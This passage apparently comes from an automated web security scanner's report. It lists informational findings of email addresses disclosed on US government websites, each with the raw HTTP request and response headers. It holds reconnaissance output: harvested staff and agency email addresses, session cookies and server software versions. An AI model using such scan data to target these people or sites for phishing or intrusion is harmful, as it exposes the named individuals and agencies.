Set-Cookie: .ASPXANONYMOUS=tJVMb8U9zAEkAAAAMTczMWU4YWQtZTRiOS00NTdkLWJkMmItYWFiOTdiZjFlN2Mw0; expires=Fri, 08-Jul-2011 23:19:07 GMT; path=/; HttpOnly
Set-Cookie: DotNetNukeAnonymous=8637402f-2b13-470d-89b8-082faaf8e500; expires=Sat, 30-Apr-2011 12:59:07 GMT; path=/; HttpOnly
Set-Cookie: language=en-US; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Sat, 30 Apr 2011 12:39:08 GMT
Connection: close
Content-Length: 153586

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xml:lang="en-US" lang="en-US" xmlns="http://www.w3.org/1999/xhtml
...[SNIP]...
<a href="mailto:swebb@ksde.org">swebb@ksde.org</a>
...[SNIP]...
<a href="mailto:tcote@ksde.org">tcote@ksde.org</a>
...[SNIP]...

22.163. http://www.mcgi.state.mi.us/milocator/default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mcgi.state.mi.us
Path:   /milocator/default.aspx

Issue detail

The following email address was disclosed in the response:

Request

GET /milocator/default.aspx HTTP/1.1
Host: www.mcgi.state.mi.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 30 Apr 2011 12:39:16 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 15002


<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="
...[SNIP]...
<a href="mailTo:milocator@michigan.gov?Subject=MiLocatorFeedback" class="right" title="Send feedback about this map or content" target="_blank">
...[SNIP]...
<a href="mailTo:milocator@michigan.gov?Subject=MiLocatorFeedback" class="right" title="Send feedback about this map or content" target="_blank">
...[SNIP]...

22.164. http://www.mema.state.md.us/MEMA/content_page.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mema.state.md.us
Path:   /MEMA/content_page.jsp

Issue detail

The following email address was disclosed in the response:

Request

GET /MEMA/content_page.jsp HTTP/1.1
Host: www.mema.state.md.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 30 Apr 2011 12:39:17 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
set-cookie:JSESSIONID=AAHZoUENylmma40Rij+x5A;Domain=www.mema.state.md.us;Path=/MEMA
connection:Close
content-type:text/html;charset=ISO-8859-1
content-length:25356

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><!-- InstanceBegin template="/Temp
...[SNIP]...
<a href="mailto:comments@mema.state.md.us">
...[SNIP]...

22.165. http://www.mo.gov/my-government/transparency-accountability/meetings/details.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mo.gov
Path:   /my-government/transparency-accountability/meetings/details.php

Issue detail

The following email address was disclosed in the response:

Request

GET /my-government/transparency-accountability/meetings/details.php HTTP/1.1
Host: www.mo.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gs_p_GSN-237422-W=1664119246; __utmz=59250609.1304162038.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gs_u=1496610374:2567:5000:1304162085744; __utma=59250609.68601831.1304162038.1304162038.1304162038.1; __utmc=59250609; __utmb=59250609.1.10.1304162038;

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 12:39:23 GMT
Server: Apache
Vary: User-Agent,Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 21000

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" cont
...[SNIP]...
<a href="mailto:openmtgnotices@oa.mo.gov">openmtgnotices@oa.mo.gov</a>
...[SNIP]...

22.166. http://www.mo.gov/wp-content/themes/Mo.gov/js/compiled/compiled-js.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mo.gov
Path:   /wp-content/themes/Mo.gov/js/compiled/compiled-js.php

Issue detail

The following email address was disclosed in the response:

Request

GET /wp-content/themes/Mo.gov/js/compiled/compiled-js.php HTTP/1.1
Host: www.mo.gov
Proxy-Connection: keep-alive
Referer: http://www.mo.gov/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 11:13:33 GMT
Server: Apache
Vary: Accept-Encoding
Connection: close
Content-Type: application/x-javascript
Content-Length: 66734

/*
* jQuery validation plug-in 1.7
*
* http://bassistance.de/jquery-plugins/jquery-plugin-validation/
* http://docs.jquery.com/Plugins/Validation
*
* Copyright (c) 2006 - 2008 J..rn Zaefferer
*
...[SNIP]...
irst Name",
           lname:"Last Name",
           address_1:"Address",
           city:"City",
           zip:"Zip",
           phone:"Phone",
           message:"Message",
           email:
           {
               required:'Email',
               email:'Invalid Email (example@email.com)'
           }
       }
   });
   $('.reset').click(function(e)
   {
       e.preventDefault();
       var fields =
       [
           $('#email'),
           $('#fname'),
           $('#lname'),
           $('#address_1'),
           $('#address_2'),
           $('
...[SNIP]...
           {
               required:true,
               email:true
           }
       },
       messages:
       {
           feedback:"Feedback",
           zip:"Zip",
           message:"Message",
           email:
           {
               required:'Email',
               email:'Invalid Email (example@email.com)'
           }
       }
   });
   $('.reset').click(function(e)
   {
       e.preventDefault();
       var fields =
       [
           $('#email'),
           $('#feedback'),
           $('#zip'),
           $('#message')
       ];
       for(var i=0; i < fiel
...[SNIP]...
st Name",
           lname:"Last Name",
           address_1:"Address",
           city:"City",
           zip:"Zip",
           phone:"Phone",
           message:"Your Idea",
           email:
           {
               required:'Email',
               email:'Invalid Email (example@email.com)'
           }
       }
   });
   $('.reset').click(function(e)
   {
       e.preventDefault();
       var fields =
       [
           $('#email'),
           $('#fname'),
           $('#lname'),
           $('#address_1'),
           $('#address_2'),
           $('
...[SNIP]...

22.167. http://www.nh.gov/accountancy/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nh.gov
Path:   /accountancy/

Issue detail

The following email address was disclosed in the response:

Request

GET /accountancy/ HTTP/1.1
Host: www.nh.gov
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 29 Apr 2011 22:39:21 GMT
Server: Apache
Last-Modified: Fri, 29 Apr 2011 18:32:50 GMT
ETag: "1390002-7847-e6ac3880"
Accept-Ranges: bytes
Content-Length: 30791
Connection: close
Content-Type: text/html; charset=ISO-8859-1

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><!-- InstanceBegin template="/Temp
...[SNIP]...
<a href="mailto:boa@nh.gov">boa@nh.gov</a>
...[SNIP]...
<br />
TDD Access: Relay NH 1-800-735-2964 E-mail: boa@nh.gov</p>
...[SNIP]...

22.168. http://www.nh.gov/dot/nhrideshare/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nh.gov
Path:   /dot/nhrideshare/

Issue detail

The following email addresses were disclosed in the response:

Request

GET /dot/nhrideshare/ HTTP/1.1
Host: www.nh.gov
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 29 Apr 2011 22:37:31 GMT
Server: Apache
Accept-Ranges: bytes
Content-Length: 6765
Connection: close
Content-Type: text/html; charset=ISO-8859-1

<html>

<head>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
<!-- This site was developed by -->
<!-- The New Hampshire Department of Transp
...[SNIP]...
<!-- tgilligan@dot.state.nh.us -->
...[SNIP]...
<a
href="mailto:coordinator@dot.state.nh.us">
...[SNIP]...

22.169. http://www.nh.gov/scripts/textsizer.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nh.gov
Path:   /scripts/textsizer.js

Issue detail

The following email address was disclosed in the response:

Request

GET /scripts/textsizer.js HTTP/1.1
Host: www.nh.gov
Proxy-Connection: keep-alive
Referer: http://www.governor.nh.gov/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 29 Apr 2011 22:36:41 GMT
Server: Apache
Last-Modified: Sun, 13 Mar 2011 10:00:00 GMT
ETag: "a38005-1463-4218a800"
Accept-Ranges: bytes
Content-Length: 5219
Connection: close
Content-Type: application/x-javascript

/*------------------------------------------------------------
   Document Text Sizer- Copyright 2003 - Taewook Kang. All rights reserved.
   Coded by: Taewook Kang (txkang.REMOVETHIS@hotmail.com)
   Web Site: http://txkang.com
   Script featured on Dynamic Drive (http://www.dynamicdrive.com)
   
   Please retain this copyright notice in the script.
   License is granted to user to reuse this code
...[SNIP]...

22.170. http://www.nhfishandgame.com/cgi-bin/gl/outdoor.cgi  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nhfishandgame.com
Path:   /cgi-bin/gl/outdoor.cgi

Issue detail

The following email addresses were disclosed in the response:

Request

GET /cgi-bin/gl/outdoor.cgi?pg=ContactGL HTTP/1.1
Host: www.nhfishandgame.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=111112922.904209617.1304116995.1304116995.1304116995.1; __utmb=111112922; __utmc=111112922; __utmz=111112922.1304116995.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Fri, 29 Apr 2011 22:43:58 GMT
Server: OutdoorCentralServer
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 17984


<html>
<head>
<title>GreatLodge.com :: Outdoor Central :: Active Outdoors</title>

<style type=text/css>
.button {font-weight:bold; color:#ffffff; background-color:#006600; border:#000000; border-
...[SNIP]...
<a href=mailto:Licensing@outdoorcentral.net>Licensing@outdoorcentral.net</a>
...[SNIP]...
<a href="mailTo:business@outdoorcentral.net">business@outdoorcentral.net</a>
...[SNIP]...

22.171. http://www.nist.gov/search-results.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nist.gov
Path:   /search-results.cfm

Issue detail

The following email address was disclosed in the response:

Request

GET /search-results.cfm?q=xss.cx&btng=Search&num=10&sortType=L&scopeType=0&datefrom=&dateto= HTTP/1.1
Host: www.nist.gov
Proxy-Connection: keep-alive
Referer: http://www.nist.gov/srd/onlinelist.htm
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 01:00:13 GMT
Server: Apache
Set-Cookie: CFID=17042990;path=/
Set-Cookie: CFTOKEN=54636047;path=/
Last-Modified: Tue, 4 Jan 2011 22:32:06 GMT
NIST: g3
Content-Type: text/html; charset=iso-8859-1
Content-Length: 18308

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <!-- Conte
...[SNIP]...
<a href="mailto:DO-webmaster@nist.gov" class="bold">
...[SNIP]...

22.172. http://www.nist.gov/srd/onlinelist.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nist.gov
Path:   /srd/onlinelist.htm

Issue detail

The following email addresses were disclosed in the response:

Request

GET /srd/onlinelist.htm HTTP/1.1
Host: www.nist.gov
Proxy-Connection: keep-alive
Referer: http://data.osbm.state.nc.us/pls/pbis/dyn_osbmweb_libdatalinks.show?p_arg_names=context&p_arg_values=facts
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 01:00:05 GMT
Server: Apache
NIST: g3
Content-Type: text/html; charset=UTF-8
Content-Length: 13113

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<!-- Con
...[SNIP]...
<a href="mailto:inquiries@nist.gov">
...[SNIP]...
<a href="mailto:DO-webmaster@nist.gov">DO-webmaster@nist.gov</a>
...[SNIP]...
<a href="mailto:inquiries@nist.gov">inquiries@nist.gov</a>
...[SNIP]...

22.173. http://www.nmcpr.state.nm.us/nmac/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nmcpr.state.nm.us
Path:   /nmac/

Issue detail

The following email address was disclosed in the response:

Request

GET /nmac/ HTTP/1.1
Host: www.nmcpr.state.nm.us
Proxy-Connection: keep-alive
Referer: http://www.newmexico.gov/business.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Content-Location: http://www.nmcpr.state.nm.us/nmac/index.htm
Date: Sat, 30 Apr 2011 11:24:21 GMT
Content-Type: text/html
Accept-Ranges: bytes
Last-Modified: Fri, 29 Apr 2011 16:58:42 GMT
ETag: "fc6cdcb18e6cc1:175a"
Content-Length: 5881


<html>
<head>
<meta http-equiv=Content-Type content="text/html; charset=windows-1252">
<link rel=Edit-Time-Data href="./NMAC_files/editdata.mso">
<Link rel="shortcut icon" href="favicon.ico">
<
...[SNIP]...
<a href="mailto:staterules@state.nm.us?subject=NMAC Website">staterules@state.nm.us</a>
...[SNIP]...

22.174. http://www.nv.gov/NV_default4.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nv.gov
Path:   /NV_default4.aspx

Issue detail

The following email addresses were disclosed in the response:

Request

GET /NV_default4.aspx?id=345 HTTP/1.1
Host: www.nv.gov
Proxy-Connection: keep-alive
Referer: http://nv.gov/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&DefaultCurrency=840&SiteCurrency=840&ContType=&UserCulture=1033&dm=www.nv.gov&SiteLanguage=1033; path=/
Set-Cookie: EktGUID=5ddcfda7-21c6-4f17-acf6-3568d114748f; expires=Mon, 30-Apr-2012 11:24:28 GMT; path=/
Set-Cookie: EkAnalytics=newuser; expires=Mon, 30-Apr-2012 11:24:28 GMT; path=/
Set-Cookie: ASP.NET_SessionId=mzbc3255iwftyx2sfkbnli45; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Sat, 30 Apr 2011 11:24:29 GMT
Content-Length: 23621


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><ti
...[SNIP]...
<a href="mailto:ltgov@ltgov.nv.gov"><font color="#000066" face="Arial">ltgov@ltgov.nv.gov</font>
...[SNIP]...
<a href="mailto:ltgov@ltgov.nv.gov"><font color="#000066" face="Arial">sosexec@sos.nv.gov</font>
...[SNIP]...
<a href="mailto:StateTreasurer@NevadaTreasurer.gov"><font color="#000080">StateTreasurer@NevadaTreasurer.gov</font>
...[SNIP]...
<a href="mailto:kwallin@govmail.state.nv.us"><font color="#000066" face="Arial" size="2">kwallin@govmail.state.nv.us</font>
...[SNIP]...

22.175. http://www.nv.gov/WorkArea/java/ektron.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nv.gov
Path:   /WorkArea/java/ektron.js

Issue detail

The following email address was disclosed in the response:

Request

GET /WorkArea/java/ektron.js HTTP/1.1
Host: www.nv.gov
Proxy-Connection: keep-alive
Referer: http://www.nv.gov/NV_default4.aspx?id=345
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&DefaultCurrency=840&SiteCurrency=840&ContType=&UserCulture=1033&dm=www.nv.gov&SiteLanguage=1033; EktGUID=3242dd35-5d85-4b04-841c-e344a6607f3b; EkAnalytics=newuser; ASP.NET_SessionId=hkc1c0jbt34kty550xanvxr0

Response

HTTP/1.1 200 OK
Cache-Control: public
Content-Length: 172238
Content-Type: text/javascript
Last-Modified: Wed, 25 Nov 2009 16:17:30 GMT
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sat, 30 Apr 2011 11:24:18 GMT

if ("undefined" == typeof $ektron)
{
/*
Ektron JavaScript Library
Copyright (c) 2008 Ektron, Inc.
All rights reserved

Instructions to upgrade this Ektron Li
...[SNIP]...
(Ektron.RegExp.rtrim,""); },

// method to work around bugs in jquery' offset() when element is nested inside relative/absolute elements
// from: http://www.mail-archive.com/jquery-en@googlegroups.com/msg72499.html
positionedOffset: function(elem) {
var offsetParent = elem.offsetParent(), offset = elem.offset(), position = elem.position();
if ( !/^body|html$/i.tes
...[SNIP]...

22.176. http://www.nv.gov/ext/adapter/ext/ext-base.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nv.gov
Path:   /ext/adapter/ext/ext-base.js

Issue detail

The following email address was disclosed in the response:

Request

GET /ext/adapter/ext/ext-base.js HTTP/1.1
Host: www.nv.gov
Proxy-Connection: keep-alive
Referer: http://www.nv.gov/NV_default4.aspx?id=345
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&DefaultCurrency=840&SiteCurrency=840&ContType=&UserCulture=1033&dm=www.nv.gov&SiteLanguage=1033; EktGUID=3242dd35-5d85-4b04-841c-e344a6607f3b; EkAnalytics=newuser; ASP.NET_SessionId=hkc1c0jbt34kty550xanvxr0

Response

HTTP/1.1 200 OK
Cache-Control: public
Content-Length: 32145
Content-Type: text/javascript
Last-Modified: Wed, 20 Jan 2010 17:40:38 GMT
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sat, 30 Apr 2011 11:24:20 GMT

/*
* Ext JS Library 3.0.0
* Copyright(c) 2006-2009 Ext JS, LLC
* licensing@extjs.com
* http://www.extjs.com/license
*/
window.undefined=window.undefined;Ext={version:"3.0"};Ext.apply=function(d,e,b){if(b){Ext.apply(d,b)}if(d&&e&&typeof e=="object"){for(var a in e){d[a]=e[a]}}return
...[SNIP]...

22.177. http://www.nv.gov/ext/ext-all.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nv.gov
Path:   /ext/ext-all.js

Issue detail

The following email addresses were disclosed in the response:

Request

GET /ext/ext-all.js HTTP/1.1
Host: www.nv.gov
Proxy-Connection: keep-alive
Referer: http://www.nv.gov/NV_default4.aspx?id=345
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&DefaultCurrency=840&SiteCurrency=840&ContType=&UserCulture=1033&dm=www.nv.gov&SiteLanguage=1033; EktGUID=3242dd35-5d85-4b04-841c-e344a6607f3b; EkAnalytics=newuser; ASP.NET_SessionId=hkc1c0jbt34kty550xanvxr0

Response

HTTP/1.1 200 OK
Cache-Control: public
Content-Length: 624432
Content-Type: text/javascript
Last-Modified: Wed, 20 Jan 2010 17:42:00 GMT
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sat, 30 Apr 2011 11:24:23 GMT

/*
* Ext JS Library 3.0.0
* Copyright(c) 2006-2009 Ext JS, LLC
* licensing@extjs.com
* http://www.extjs.com/license
*/
Ext.DomHelper=function(){var s=null,j=/^(?:br|frame|hr|img|input|link|meta|range|spacer|wbr|area|param|col)$/i,l=/^table|tbody|tr|td$/i,p,m="afterbegin",n="afterend
...[SNIP]...
\/([\-\w]+\.)+\w{2,3}(\/[%\-\w]+(\.\w{2,})?)*(([\w\-\.\?\\\/+@&#;`~=%!]*)(\.\w{2,})?)*\/?)/i;return{email:function(e){return b.test(e)},emailText:'This field should be an e-mail address in the format "user@example.com"',emailMask:/[a-z0-9_\.\-@]/i,url:function(e){return a.test(e)},urlText:'This field should be a URL in the format "http://www.example.com"',alpha:function(e){return c.test(e)},alphaText:"This field sh
...[SNIP]...

22.178. http://www.nv.gov/ext/resources/css/ext-all.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nv.gov
Path:   /ext/resources/css/ext-all.css

Issue detail

The following email address was disclosed in the response:

Request

GET /ext/resources/css/ext-all.css HTTP/1.1
Host: www.nv.gov
Proxy-Connection: keep-alive
Referer: http://www.nv.gov/NV_default4.aspx?id=345
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&DefaultCurrency=840&SiteCurrency=840&ContType=&UserCulture=1033&dm=www.nv.gov&SiteLanguage=1033; EktGUID=3242dd35-5d85-4b04-841c-e344a6607f3b; EkAnalytics=newuser; ASP.NET_SessionId=hkc1c0jbt34kty550xanvxr0

Response

HTTP/1.1 200 OK
Cache-Control: public
Content-Length: 143116
Content-Type: text/css
Last-Modified: Wed, 20 Jan 2010 17:42:00 GMT
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sat, 30 Apr 2011 11:24:20 GMT

/*!
* Ext JS Library 3.0.0
* Copyright(c) 2006-2009 Ext JS, LLC
* licensing@extjs.com
* http://www.extjs.com/license
*/
html,body,div,dl,dt,dd,ul,ol,li,h1,h2,h3,h4,h5,h6,pre,form,fieldset,input,p,blockquote,th,td{margin:0;padding:0;}img,body,html{border:0;}address,caption,cite,code,d
...[SNIP]...

22.179. http://www.nv.gov/ext/resources/css/xtheme-blue.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nv.gov
Path:   /ext/resources/css/xtheme-blue.css

Issue detail

The following email address was disclosed in the response:

Request

GET /ext/resources/css/xtheme-blue.css HTTP/1.1
Host: www.nv.gov
Proxy-Connection: keep-alive
Referer: http://www.nv.gov/NV_default4.aspx?id=345
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&DefaultCurrency=840&SiteCurrency=840&ContType=&UserCulture=1033&dm=www.nv.gov&SiteLanguage=1033; EktGUID=3242dd35-5d85-4b04-841c-e344a6607f3b; EkAnalytics=newuser; ASP.NET_SessionId=hkc1c0jbt34kty550xanvxr0

Response

HTTP/1.1 200 OK
Cache-Control: public
Content-Length: 39163
Content-Type: text/css
Last-Modified: Wed, 20 Jan 2010 17:42:00 GMT
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sat, 30 Apr 2011 11:24:20 GMT

/*!
* Ext JS Library 3.0.0
* Copyright(c) 2006-2009 Ext JS, LLC
* licensing@extjs.com
* http://www.extjs.com/license
*/
.ext-el-mask {
background-color: #ccc;
}

.ext-el-mask-msg {
border-color:#6593cf;
background-color:#c3daf9;
background-image:url(../images/d
...[SNIP]...

22.180. http://www.nyfirst.ny.gov/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nyfirst.ny.gov
Path:   /

Issue detail

The following email address was disclosed in the response:

Request

GET / HTTP/1.1
Host: www.nyfirst.ny.gov
Proxy-Connection: keep-alive
Referer: http://ny.gov/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
